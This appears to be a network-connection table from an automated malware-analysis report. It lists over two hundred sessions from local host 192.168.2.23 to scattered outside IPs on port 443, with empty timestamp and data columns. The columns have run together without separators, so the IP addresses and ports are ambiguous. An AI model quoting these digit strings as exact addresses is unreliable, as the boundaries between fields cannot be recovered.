                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13468192.168.2.23415862.87.175.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13469192.168.2.2346320125.2.248.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13470192.168.2.234770612.179.151.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13471192.168.2.23474588.100.243.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13472192.168.2.235114687.224.115.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13473192.168.2.2355138116.215.196.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13474192.168.2.235517080.2.134.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13475192.168.2.234500831.148.105.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13476192.168.2.234903264.181.106.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13477192.168.2.2358416190.14.108.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13478192.168.2.2341636113.141.16.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13479192.168.2.2337226120.239.189.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13480192.168.2.2347534151.29.255.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13481192.168.2.235360049.122.105.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13482192.168.2.234785859.44.139.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13483192.168.2.235967024.78.250.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13484192.168.2.2357528131.111.97.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13485192.168.2.2334918168.217.172.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13486192.168.2.2333964136.93.161.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13487192.168.2.235489880.112.29.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13488192.168.2.2354116115.147.66.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13489192.168.2.233912247.154.213.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13490192.168.2.2346998183.180.129.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13491192.168.2.2352890121.161.170.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13492192.168.2.235378898.119.234.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13493192.168.2.2358876107.140.90.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13494192.168.2.23495549.102.224.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13495192.168.2.2346414196.35.134.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13496192.168.2.2346512198.230.232.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13497192.168.2.235865634.25.180.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13498192.168.2.235829617.238.106.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13499192.168.2.2351414220.62.163.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13500192.168.2.233891084.210.32.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13501192.168.2.2342138134.153.139.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13502192.168.2.235911898.239.92.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13503192.168.2.2360888222.106.68.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13504192.168.2.2349692155.33.143.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13505192.168.2.234698896.104.88.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13506192.168.2.2347034179.166.19.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13507192.168.2.233771272.144.227.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13508192.168.2.2354556117.53.55.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13509192.168.2.2360462195.183.124.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13510192.168.2.2345790216.41.55.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13511192.168.2.2358288151.27.60.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13512192.168.2.2339530153.6.194.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13513192.168.2.234324295.151.195.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13514192.168.2.2349626135.79.155.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13515192.168.2.2337246141.125.90.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13516192.168.2.2339576145.54.83.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13517192.168.2.235163059.132.136.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13518192.168.2.2342720133.189.202.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13519192.168.2.2349802128.159.51.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13520192.168.2.235197884.100.48.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13521192.168.2.2352224175.232.14.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13522192.168.2.235525442.212.205.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13523192.168.2.234383645.104.189.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13524192.168.2.2350180123.17.173.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13525192.168.2.2341326196.120.232.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13526192.168.2.2343166114.149.79.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13527192.168.2.2345944121.40.215.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13528192.168.2.2344496221.170.38.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13529192.168.2.2353866208.232.0.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13530192.168.2.235879479.112.240.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13531192.168.2.2358202138.94.25.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13532192.168.2.2340080178.50.255.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13533192.168.2.2341284139.115.118.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13534192.168.2.234938641.67.63.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13535192.168.2.2345270111.181.132.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13536192.168.2.2352286198.185.178.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13537192.168.2.2339474147.175.174.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13538192.168.2.2355852122.90.18.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13539192.168.2.234499058.225.170.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13540192.168.2.23580601.71.68.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13541192.168.2.2353286112.26.94.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13542192.168.2.2340986121.98.223.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13543192.168.2.2346758133.197.77.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13544192.168.2.2337562105.29.16.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13545192.168.2.235541893.184.16.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13546192.168.2.2350300156.148.136.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13547192.168.2.2343470107.88.237.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13548192.168.2.2338034132.155.8.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13549192.168.2.2358900115.133.78.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13550192.168.2.2354286160.104.4.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13551192.168.2.2349400119.148.150.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13552192.168.2.2341060145.5.131.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13553192.168.2.2354430176.203.33.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13554192.168.2.2340866108.152.212.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13555192.168.2.2352038140.151.118.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13556192.168.2.2339878152.29.32.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13557192.168.2.234823874.107.44.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13558192.168.2.235446692.38.63.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13559192.168.2.235125448.180.247.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13560192.168.2.233371469.210.62.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13561192.168.2.2343964135.160.74.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13562192.168.2.2349154105.68.167.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13563192.168.2.233760284.132.114.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13564192.168.2.235792869.145.230.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13565192.168.2.234568077.131.120.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13566192.168.2.2340488174.203.217.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13567192.168.2.234678437.46.54.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13568192.168.2.2335256129.7.108.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13569192.168.2.234880498.153.209.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13570192.168.2.23552229.63.82.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13571192.168.2.2345118192.153.203.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13572192.168.2.2357508175.26.146.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13573192.168.2.233295041.176.200.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13574192.168.2.2353122200.39.151.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13575192.168.2.234582885.84.153.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13576192.168.2.234411870.29.115.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13577192.168.2.235470681.73.247.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13578192.168.2.2336056135.209.112.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13579192.168.2.234795847.253.159.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13580192.168.2.2351488212.198.83.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13581192.168.2.2336950161.168.130.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13582192.168.2.23376285.254.111.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13583192.168.2.234896048.144.232.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13584192.168.2.235744217.84.42.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13585192.168.2.2356364193.233.133.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13586192.168.2.235025074.174.86.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13587192.168.2.2347112154.120.105.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13588192.168.2.2340814197.48.79.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13589192.168.2.233812464.132.79.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13590192.168.2.235209885.242.180.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13591192.168.2.2350776167.79.206.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13592192.168.2.234126080.165.97.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13593192.168.2.235604285.93.11.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13594192.168.2.2337454195.108.179.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13595192.168.2.2336816178.192.165.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13596192.168.2.234107681.51.102.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13597192.168.2.2355116156.202.12.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13598192.168.2.2354684142.53.85.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13599192.168.2.2339504148.213.22.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13600192.168.2.234129441.52.238.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13601192.168.2.2333402164.124.229.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13602192.168.2.2344922165.246.85.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13603192.168.2.234361853.197.111.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13604192.168.2.2351034202.195.111.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13605192.168.2.2356126141.13.253.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13606192.168.2.2338282111.120.63.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13607192.168.2.236005291.31.47.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13608192.168.2.2335908149.82.228.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13609192.168.2.234461449.80.7.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13610192.168.2.233607067.17.197.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13611192.168.2.234826287.113.119.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13612192.168.2.2341446130.159.148.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13613192.168.2.2333044151.207.52.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13614192.168.2.2356476189.72.127.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13615192.168.2.2345518190.101.168.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13616192.168.2.2347726211.44.195.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13617192.168.2.2358002104.135.69.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13618192.168.2.2354636117.84.32.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13619192.168.2.235813877.152.162.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13620192.168.2.2347794197.144.8.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13621192.168.2.235548473.188.200.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13622192.168.2.2338532133.162.114.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13623192.168.2.235848050.226.73.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13624192.168.2.234850625.44.145.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13625192.168.2.234222470.15.183.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13626192.168.2.235510252.186.5.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13627192.168.2.2333384133.89.221.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13628192.168.2.2360304177.18.204.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13629192.168.2.23379949.149.87.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13630192.168.2.2349630111.195.64.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13631192.168.2.234823464.134.170.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13632192.168.2.2333890123.91.60.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13633192.168.2.2347254151.250.77.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13634192.168.2.233543632.235.244.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13635192.168.2.235538895.201.73.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13636192.168.2.2352804188.231.239.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13637192.168.2.2359754193.89.247.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13638192.168.2.23550364.120.154.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13639192.168.2.234534058.70.124.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13640192.168.2.2352522192.167.169.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13641192.168.2.234552496.206.18.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13642192.168.2.2336030174.108.35.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13643192.168.2.2352782211.77.209.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13644192.168.2.2346386137.2.163.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13645192.168.2.2347264175.5.31.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13646192.168.2.2358586133.197.90.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13647192.168.2.2343648169.192.127.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13648192.168.2.2355602134.75.114.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13649192.168.2.234381277.122.138.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13650192.168.2.233790448.196.108.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13651192.168.2.234191220.26.235.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13652192.168.2.235415642.175.7.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13653192.168.2.234804235.108.176.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13654192.168.2.2359358171.229.4.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13655192.168.2.2335988175.157.41.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13656192.168.2.2351654211.82.141.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13657192.168.2.2336194122.104.215.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13658192.168.2.2351332156.219.154.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13659192.168.2.2346272115.15.143.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13660192.168.2.234545099.244.146.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13661192.168.2.234709212.144.76.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13662192.168.2.236097864.88.118.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13663192.168.2.233871465.145.133.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13664192.168.2.233438450.191.156.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13665192.168.2.2349036204.97.192.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13666192.168.2.235668679.92.118.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13667192.168.2.2349764189.89.35.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13668192.168.2.2347280130.0.176.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13669192.168.2.234548899.237.117.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13670192.168.2.2342236207.24.42.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13671192.168.2.23379342.103.134.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13672192.168.2.2339210154.207.196.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13673192.168.2.234193294.103.158.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13674192.168.2.235659476.217.170.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13675192.168.2.2339722135.115.204.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13676192.168.2.2336632142.81.54.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13677192.168.2.233422650.215.108.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13678192.168.2.234297864.51.202.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13679192.168.2.2348640197.40.108.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13680192.168.2.2358300131.34.148.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13681192.168.2.2354400115.39.250.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13682192.168.2.2356696201.120.81.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13683192.168.2.2341070177.77.130.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13684192.168.2.2338738211.255.24.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13685192.168.2.23563128.40.40.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13686192.168.2.2360466207.190.11.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13687192.168.2.234522495.247.198.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13688192.168.2.2342332192.87.189.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
